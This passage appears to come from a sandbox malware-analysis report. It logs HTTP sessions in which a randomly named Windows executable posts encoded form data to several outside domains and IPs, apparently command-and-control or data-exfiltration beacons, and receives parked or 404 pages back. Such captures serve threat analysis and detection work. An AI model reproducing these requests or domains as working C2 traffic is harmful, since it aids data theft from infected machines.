Oct 8, 2024 15:36:36.959029913 CEST | 1236 | IN | Data Raw: 33 34 33 32 39 63 31 37 2e 36 39 31 34 36 2c 30 2c 32 38 2e 31 33 37 38 34 2c 39 2e 30 35 35 31 37 2c 32 38 2e 31 33 37 38 34 2c 32 36 2e 36 30 35 36 35 76 35 30 2e 30 30 35 32 39 41 32 2e 38 30 34 33 36 2c 32 2e 38 30 34 33 36 2c 30 2c 30 2c 31
Data Ascii: 34329c17.69146,0,28.13784,9.05517,28.13784,26.60565v50.00529A2.80436,2.80436,0,0,1,267.18568,150.10066Z" class="cls-2"></path><path d="M344.50486,117.228H299.0941v.42056c0,8.07577,3.345,17.68641,16.71576,17.68641,10.16713,0,19.78114-.83473,25.
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.959044933 CEST1236INData Raw: 31 31 32 35 36 76 35 2e 32 37 39 38 38 63 30 2c 2e 38 31 31 38 34 2d 2e 36 34 37 33 33 2c 31 2e 32 31 35 39 32 2d 31 2e 34 35 38 38 34 2c 31 2e 32 31 35 39 32 68 2d 2e 32 34 36 32 38 61 37 30 2e 33 35 35 33 35 2c 37 30 2e 33 35 35 33 35 2c 30 2c
                                                                                                                                                                                                              Data Ascii: 11256v5.27988c0,.81184-.64733,1.21592-1.45884,1.21592h-.24628a70.35535,70.35535,0,0,0-10.48137-.56187c-3.81768,0-7.79988,2.1849-7.79988,10.6422v7.557c0,8.45056,3.9822,10.64186,7.79988,10.64186a70.19544,70.19544,0,0,0,10.48137-.56826h.24628c.81
                                                                                                                                                                                                              Oct 8, 2024 15:36:36.960849047 CEST421INData Raw: 31 2e 36 33 38 32 34 2c 30 2c 30 2c 31 2d 31 2e 35 34 37 33 33 2d 31 2e 37 31 31 38 35 56 31 31 39 2e 32 32 35 34 38 63 30 2d 31 30 2e 32 33 39 38 31 2c 36 2e 30 39 34 37 36 2d 31 35 2e 35 32 31 33 38 2c 31 36 2e 34 31 31 36 31 2d 31 35 2e 35 32
                                                                                                                                                                                                              Data Ascii: 1.63824,0,0,1-1.54733-1.71185V119.22548c0-10.23981,6.09476-15.52138,16.41161-15.52138h1.9551c4.55047,0,8.204,1.05814,10.72429,3.25111,2.51663-2.193,6.25256-3.25111,10.80638-3.25111h1.9514c10.31719,0,16.412,5.28157,16.412,15.52138v29.16333A1.63


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.9 | 60855 | 3.91.127.116 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:36:39.000379086 CEST | 469 | OUT | GET /eoqq/?tpTd=WfaN7QdSX3VNxg1q9fkfNv4hQq9KYwkNivs6k+R5An5RjxagqDfSiLpQ7QxvwrMnBdqTEtPHhZ8GpglWyWgxMX7+0Hc5PxIPKPsdiKxnaB1g3ZY6yQ==&WX=rnWllP5PLlhLLtj HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.wajf.net
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Oct 8, 2024 15:36:39.447664976 CEST | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 08 Oct 2024 13:36:39 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: close
Data Raw: 32 32 37 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 61 6d 65 42 72 69 67 68 74 20 2d 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 2c 20 64 69 76 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 [TRUNCATED]
Data Ascii: 2273<!DOCTYPE html><html><head> <link rel="icon" href="data:,"> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /> <title>NameBright - Coming Soon</title> <style type="text/css"> body, div { box-sizing: border-box; } body { background-color: #f7f7f7; font: 18px sans-serif; } .page { display: flex; flex-direction: column; min-height: 100vh; height: 100%; } .wrapper { display: flex; flex-direction: column; min-height: 100vh; height: 100%; align-items: center; justify-content: center; } .container { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; width: 90vw; [TRUNCATED]
Oct 8, 2024 15:36:39.447699070 CEST | 1236 | IN | Data Raw: 74 3a 20 34 30 76 77 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 78 2d 68 65 69 67 68 74 3a 20 37 30 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 36 34 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
Data Ascii: t: 40vw; max-height: 700px; min-height: 640px; background: #ffffff; border-radius: 1.5%; padding: 50px 5vw; } .main { display: flex;
Oct 8, 2024 15:36:39.447715044 CEST | 1236 | IN | Data Raw: 69 74 65 63 64 6e 2e 63 6f 6d 2f 6e 62 2f 63 64 6c 2f 63 6f 6d 69 6e 67 2d 73 6f 6f 6e 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6f 6d 6d 69 6e 67 20 73 6f 6f 6e 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22
Data Ascii: itecdn.com/nb/cdl/coming-soon.png" alt="comming soon" /> <div class="main"> <h1>wajf.net is coming soon</h1> </div> <div>This domain is managed at <br> <a href="/
Oct 8, 2024 15:36:39.447725058 CEST | 1236 | IN | Data Raw: 2d 37 2e 36 36 30 35 39 2d 34 2e 30 33 38 2d 31 34 2e 37 36 34 2d 31 37 2e 31 33 34 36 34 2d 31 34 2e 37 36 34 48 33 37 38 2e 35 37 30 32 35 76 33 30 2e 36 34 36 37 34 63 33 2e 33 34 34 36 33 2c 30 2c 38 2e 34 39 36 36 36 2e 32 37 39 32 35 2c 31
Data Ascii: -7.66059-4.038-14.764-17.13464-14.764H378.57025v30.64674c3.34463,0,8.49666.27925,11.42241.27925,17.82941,0,23.40032-4.59656,23.40032-14.34851Zm62.4236-33.0123a79.44713,79.44713,0,0,0-13.6487.9757v60.17443a2.80457,2.80457,0,0,1-2.64818,2.92778H
Oct 8, 2024 15:36:39.447745085 CEST | 1236 | IN | Data Raw: 35 33 2d 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 32 33 35 56 31 30 35 2e 35 32 36 63 30 2d 32 31 2e 37 33 31 31 39 2c 31 30 2e 38 36 35 36 2d 33 34 2e 39 36 34 2c 33 33 2e 32 39 36 32 37 2d 33 34 2e 39 36 34 41 31 31 38 2e 38 30 37 37 39 2c 31
Data Ascii: 53-33.29627-34.96235V105.526c0-21.73119,10.8656-34.964,33.29627-34.964A118.80779,118.80779,0,0,1,581.4102,74.1828c3.20332.83607,3.76519,1.67248,3.76519,3.76216V149.8214C585.17539,169.60389,575.14452,177.95924,553.83389,177.95924ZM566.7858,86.8
Oct 8, 2024 15:36:39.447755098 CEST | 1120 | IN | Data Raw: 2e 39 39 30 32 63 30 2c 35 2e 35 37 35 36 32 2c 32 2e 35 30 36 38 38 2c 36 2e 35 34 38 32 39 2c 38 2e 34 39 33 33 2c 36 2e 35 34 38 32 39 48 37 31 33 2e 38 34 34 63 31 2e 38 31 33 34 35 2c 30 2c 32 2e 39 32 34 30 37 2e 36 39 36 34 35 2c 32 2e 39
Data Ascii: .9902c0,5.57562,2.50688,6.54829,8.4933,6.54829H713.844c1.81345,0,2.92407.69645,2.92407,2.08968v8.63763C716.76805,148.9833,715.93366,149.8214,714.11987,150.10066Z" class="cls-1"></path><path d="M523.55018,5.59211l4.971,2.86822a1.29783,1.29783,0
Oct 8, 2024 15:36:39.447787046 CEST | 1236 | IN | Data Raw: 37 31 2c 31 2e 33 30 39 37 31 2c 30 2c 30 2c 31 2c 35 35 32 2e 32 36 2c 34 39 2e 35 37 35 5a 22 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 34 38 30 2e 32 34 35 35 39 2c 33 37 2e 38 33 33 39 34
Data Ascii: 71,1.30971,0,0,1,552.26,49.575Z" class="cls-2"></path><path d="M480.24559,37.83394l-2.8652,4.96934a1.314,1.314,0,0,1-1.761.42392L453.41855,30.40853a1.25423,1.25423,0,0,1-.4569-1.70378l2.86519-4.96631a1.25738,1.25738,0,0,1,1.70849-.45656l22.194
Oct 8, 2024 15:36:39.447798967 CEST | 1236 | IN | Data Raw: 35 36 2e 36 39 38 31 33 2d 31 2e 32 35 35 32 39 76 2d 37 33 2e 32 36 36 61 32 2e 35 36 31 2c 32 2e 35 36 31 2c 30 2c 30 2c 31 2c 32 2e 36 34 35 31 36 2d 32 2e 36 34 38 35 32 48 37 35 2e 36 33 38 36 32 61 32 2e 35 36 31 36 35 2c 32 2e 35 36 31 36
Data Ascii: 56.69813-1.25529v-73.266a2.561,2.561,0,0,1,2.64516-2.64852H75.63862a2.56165,2.56165,0,0,1,2.64482,2.64852v95.27978A5.5874,5.5874,0,0,1,72.71118,150.10066Z" class="cls-2"></path><path d="M152.81649,147.59344a118.76528,118.76528,0,0,1-27.99855,3
Oct 8, 2024 15:36:39.448275089 CEST | 1236 | IN | Data Raw: 30 35 36 35 2c 32 38 2e 31 33 38 31 38 2d 32 36 2e 36 30 35 36 35 68 33 2e 33 34 33 63 37 2e 38 30 30 32 31 2c 30 2c 31 34 2e 30 36 37 35 37 2c 31 2e 38 31 30 34 33 2c 31 38 2e 33 38 36 35 35 2c 35 2e 35 37 32 35 39 2c 34 2e 33 31 39 2d 33 2e 37
Data Ascii: 0565,28.13818-26.60565h3.343c7.80021,0,14.06757,1.81043,18.38655,5.57259,4.319-3.76216,10.72429-5.57259,18.52585-5.57259h3.34329c17.69146,0,28.13784,9.05517,28.13784,26.60565v50.00529A2.80436,2.80436,0,0,1,267.18568,150.10066Z" class="cls-2"><
Oct 8, 2024 15:36:39.448286057 CEST | 1236 | IN | Data Raw: 30 2d 31 33 2e 32 34 34 36 32 2c 37 2e 39 36 37 37 34 2d 31 39 2e 37 34 36 38 33 2c 31 38 2e 35 32 37 35 31 2d 31 39 2e 37 34 36 38 33 61 34 34 2e 35 37 39 32 2c 34 34 2e 35 37 39 32 2c 30 2c 30 2c 31 2c 31 30 2e 34 38 31 33 37 2c 31 2e 30 35 38
Data Ascii: 0-13.24462,7.96774-19.74683,18.52751-19.74683a44.5792,44.5792,0,0,1,10.48137,1.05814c1.37978.32534,1.70512.81151,1.70512,2.11256v5.27988c0,.81184-.64733,1.21592-1.45884,1.21592h-.24628a70.35535,70.35535,0,0,0-10.48137-.56187c-3.81768,0-7.79988
Oct 8, 2024 15:36:39.448307991 CEST | 544 | IN | Data Raw: 33 36 32 2d 36 2e 35 38 31 32 37 68 2d 31 2e 39 35 35 31 63 2d 33 2e 37 33 32 35 36 2c 30 2d 35 2e 36 38 34 32 39 2c 31 2e 30 35 34 37 37 2d 35 2e 36 38 34 32 39 2c 36 2e 35 38 31 32 37 76 32 39 2e 31 36 33 33 33 61 31 2e 36 33 36 2c 31 2e 36 33
Data Ascii: 362-6.58127h-1.9551c-3.73256,0-5.68429,1.05477-5.68429,6.58127v29.16333a1.636,1.636,0,0,1-1.54733,1.71185H827.2866a1.63824,1.63824,0,0,1-1.54733-1.71185V119.22548c0-10.23981,6.09476-15.52138,16.41161-15.52138h1.9551c4.55047,0,8.204,1.05814,10.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.9 | 60856 | 195.161.68.8 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:36:44.609220028 CEST | 746 | OUT | POST /c6cw/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.drivedoge.website
Origin: http://www.drivedoge.website
Cache-Control: max-age=0
Content-Length: 193
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.drivedoge.website/c6cw/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Raw: 74 70 54 64 3d 49 6f 75 55 33 41 74 76 39 31 55 35 72 75 65 63 35 76 35 62 72 36 64 5a 79 4f 63 51 6f 4d 48 6a 63 48 44 67 4b 36 6a 54 5a 52 78 34 50 50 4e 50 2f 70 56 7a 4f 53 53 71 36 63 30 65 59 32 6d 6e 52 2f 47 34 6f 2f 61 79 78 35 65 76 5a 35 6f 68 69 76 7a 38 6e 58 38 6b 54 4b 68 4e 38 68 4b 48 52 44 57 4d 68 32 35 50 47 65 4c 74 6c 73 6b 69 4c 70 73 56 37 31 2b 76 31 47 58 4b 63 33 35 64 49 6d 31 52 77 41 32 63 42 53 63 34 62 5a 6e 51 49 2f 2f 65 78 36 55 75 78 51 32 4d 4d 59 56 57 66 56 38 2b 68 69 48 7a 4c 57 42 77 7a 37 41 48 6e 4a 30 64 50 72 64 70 48 37 48 62
Data Ascii: tpTd=IouU3Atv91U5ruec5v5br6dZyOcQoMHjcHDgK6jTZRx4PPNP/pVzOSSq6c0eY2mnR/G4o/ayx5evZ5ohivz8nX8kTKhN8hKHRDWMh25PGeLtlskiLpsV71+v1GXKc35dIm1RwA2cBSc4bZnQI//ex6UuxQ2MMYVWfV8+hiHzLWBwz7AHnJ0dPrdpH7Hb
Oct 8, 2024 15:36:45.350007057 CEST | 778 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 13:36:45 GMT
Content-Type: text/html
Content-Length: 634
Connection: close
Server: Apache
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 64 61 74 61 2d 70 61 67 65 3d 22 34 30 34 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 68 31 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 2e 20 d0 a4 d0 b0 d0 b9 d0 bb 20 d0 bd d0 b5 20 d0 bd d0 b0 d0 b9 d0 b4 d0 b5 d0 bd 3c 2f 68 31 3e 3c 70 3e d0 92 d0 be d0 b7 d0 bc d0 be d0 b6 d0 bd d0 be 2c 20 d0 b2 d1 8b 20 d0 be d1 88 d0 b8 d0 b1 d0 bb d0 b8 d1 81 d1 [TRUNCATED]
Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title> 404. </title></head><body><noscript><h1> 404. </h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                              42192.168.2.960857195.161.68.8801432C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                              Oct 8, 2024 15:36:47.166169882 CEST770OUTPOST /c6cw/ HTTP/1.1
                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                              Host: www.drivedoge.website
                                                                                                                                                                                                              Origin: http://www.drivedoge.website
                                                                                                                                                                                                              Cache-Control: max-age=0
                                                                                                                                                                                                              Content-Length: 217
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                              Referer: http://www.drivedoge.website/c6cw/
                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 49 6f 75 55 33 41 74 76 39 31 55 35 70 50 75 63 71 63 52 62 6e 4b 64 47 2b 75 63 51 6d 73 48 76 63 47 2f 67 4b 2f 43 49 5a 6a 56 34 50 75 39 50 34 6f 56 7a 4c 53 53 71 6a 73 30 62 57 57 6d 38 52 2f 61 47 6f 2f 6d 79 78 35 69 76 5a 37 67 68 6a 59 48 2f 6d 48 38 71 63 71 68 31 6a 78 4b 48 52 44 57 4d 68 32 45 59 47 65 44 74 6c 64 55 69 4b 4c 55 57 79 56 2b 73 79 47 58 4b 57 6e 35 5a 49 6d 31 4a 77 42 71 36 42 52 6b 34 62 59 58 51 49 72 72 5a 37 36 55 67 73 67 33 68 66 59 67 49 58 56 73 57 69 68 7a 59 5a 57 4a 74 39 36 67 5a 32 37 39 47 61 38 64 4f 41 63 4f 7a 72 42 46 5a 6a 6d 34 43 59 52 4e 56 75 66 78 65 65 46 59 6b 58 51 3d 3d
Data Ascii: tpTd=IouU3Atv91U5pPucqcRbnKdG+ucQmsHvcG/gK/CIZjV4Pu9P4oVzLSSqjs0bWWm8R/aGo/myx5ivZ7ghjYH/mH8qcqh1jxKHRDWMh2EYGeDtldUiKLUWyV+syGXKWn5ZIm1JwBq6BRk4bYXQIrrZ76Ugsg3hfYgIXVsWihzYZWJt96gZ279Ga8dOAcOzrBFZjm4CYRNVufxeeFYkXQ==
Oct 8, 2024 15:36:47.871860981 CEST | 778 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 13:36:47 GMT
Content-Type: text/html
Content-Length: 634
Connection: close
Server: Apache
Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Ошибка 404. Файл не найден</title></head><body><noscript><h1>Ошибка 404. Файл не найден</h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.9 | 60858 | 195.161.68.8 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:36:49.712145090 CEST | 1783 | OUT | POST /c6cw/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.drivedoge.website
Origin: http://www.drivedoge.website
Cache-Control: max-age=0
Content-Length: 1229
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.drivedoge.website/c6cw/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: tpTd= [TRUNCATED]
Oct 8, 2024 15:36:50.434241056 CEST | 778 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 13:36:50 GMT
Content-Type: text/html
Content-Length: 634
Connection: close
Server: Apache
Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Ошибка 404. Файл не найден</title></head><body><noscript><h1>Ошибка 404. Файл не найден</h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.9 | 60859 | 195.161.68.8 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:36:52.255220890 CEST | 478 | OUT | GET /c6cw/?WX=rnWllP5PLlhLLtj&tpTd=FqG002IG5EdskeSYnMZEmsgm4M8u04DOLE26DOOOZGkEYfdt2aoEMjGd+Okidkvsa7u+peDvqMbFWL8Zvpj7qkQAFbZLww+9EwijpyIUD9D3/88cfw== HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.drivedoge.website
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Oct 8, 2024 15:36:52.997530937 CEST | 778 | IN | HTTP/1.1 404 Not Found
Date: Tue, 08 Oct 2024 13:36:52 GMT
Content-Type: text/html
Content-Length: 634
Connection: close
Server: Apache
Data Ascii: <!DOCTYPE html><html data-page="404"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><title>Ошибка 404. Файл не найден</title></head><body><noscript><h1>Ошибка 404. Файл не найден</h1><p>, , , , .</p><p><a href="https://jino.ru"></a></p></noscript><div id="root"></div><script src="//parking-static.jino.ru/static/main.js?1.25.2" charset="utf-8"></script></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.9 | 60860 | 194.58.112.174 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:36:58.129393101 CEST | 737 | OUT | POST /hd7m/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.torex33.online
Origin: http://www.torex33.online
Cache-Control: max-age=0
Content-Length: 193
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.torex33.online/hd7m/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
Data Ascii: tpTd=hJzkWcr0vHdWdVwdxj33TO9gFVTezcwZnELguL474M7CM+wEwZE8P87D1wfRFgB0ZvUzGqvZTVyEVGzqibQB2ARQx3PeiAno7w0T98TrJ4VQ0hZHPsmjgoBgKvZAvMM0TT8Zit7AkSZer6lAEjxKroJN+Ar+ubClw6IO5GSu4G6S1PRZKwGxL3Z16/O8
Oct 8, 2024 15:36:58.822611094 CEST | 1236 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Tue, 08 Oct 2024 13:36:58 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip
Data: (gzip-compressed chunked body; raw hex and ASCII dumps omitted)
Oct 8, 2024 15:36:58.822639942 CEST | 1236 | IN | (continuation of gzip-compressed body; dumps omitted)
Oct 8, 2024 15:36:58.822663069 CEST | 1236 | IN | (continuation of gzip-compressed body; dumps omitted)
Oct 8, 2024 15:36:58.822674036 CEST | 112 | IN | (continuation of gzip-compressed body; dumps omitted)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.9 | 60861 | 194.58.112.174 | 80 | 1432 | C:\Program Files (x86)\xBbXuaowsrbzEUmmJxCknSytRFWIpGxALalWIlZxd\auuGcaPMTDojV.exe
Timestamp | Bytes transferred | Direction | Data
Oct 8, 2024 15:37:00.675344944 CEST | 761 | OUT | POST /hd7m/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Host: www.torex33.online
Origin: http://www.torex33.online
Cache-Control: max-age=0
Content-Length: 217
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.torex33.online/hd7m/
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.38 Safari/537.36
                                                                                                                                                                                                              Data Raw: 74 70 54 64 3d 68 4a 7a 6b 57 63 72 30 76 48 64 57 64 31 67 64 69 51 66 33 43 75 39 6a 4b 31 54 65 35 38 77 64 6e 45 58 67 75 4b 73 72 34 2b 66 43 4e 66 41 45 33 59 45 38 43 63 37 44 74 41 66 4e 61 51 42 2f 5a 76 59 52 47 76 58 5a 54 56 32 45 56 48 44 71 69 4d 4d 65 77 51 52 53 38 58 50 63 38 77 6e 6f 37 77 30 54 39 38 48 4e 4a 34 4e 51 30 53 42 48 64 35 4b 67 74 49 42 76 65 2f 5a 41 72 4d 4d 77 54 54 38 72 69 6f 65 6e 6b 52 68 65 72 34 39 41 45 33 64 46 2b 34 4a 48 6a 51 71 43 2b 72 2f 43 36 35 64 57 34 6e 32 4e 36 41 6e 31 2f 4f 78 48 62 43 50 71 65 67 5a 53 39 59 48 55 4f 76 66 31 66 62 48 63 67 50 50 46 39 57 77 41 57 4f 31 6d 55 41 3d 3d
                                                                                                                                                                                                              Data Ascii: tpTd=hJzkWcr0vHdWd1gdiQf3Cu9jK1Te58wdnEXguKsr4+fCNfAE3YE8Cc7DtAfNaQB/ZvYRGvXZTV2EVHDqiMMewQRS8XPc8wno7w0T98HNJ4NQ0SBHd5KgtIBve/ZArMMwTT8rioenkRher49AE3dF+4JHjQqC+r/C65dW4n2N6An1/OxHbCPqegZS9YHUOvf1fbHcgPPF9WwAWO1mUA==
                                                                                                                                                                                                              Oct 8, 2024 15:37:01.358906031 CEST1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:37:01 GMT
                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                              Content-Encoding: gzip
